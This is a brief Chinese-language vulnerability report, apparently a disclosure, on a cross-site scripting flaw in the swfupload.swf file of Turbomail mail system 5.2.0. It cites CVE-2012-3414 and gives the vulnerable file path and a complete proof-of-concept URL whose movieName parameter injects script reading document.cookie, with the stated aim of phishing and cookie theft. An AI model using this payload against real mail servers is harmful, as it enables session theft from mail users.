Turbomail邮件系统最新版某处存在xss漏洞,可以用来钓鱼,获取cookie等
版本:windows server下搭建的最新版5.2.0
漏洞文件为
C:\turbomail\web\webapps\ROOT\enterprise\swfupload\swfupload.swf
此版本存在xss缺陷,参考CVE-2012-3414
http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName="]);}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
如上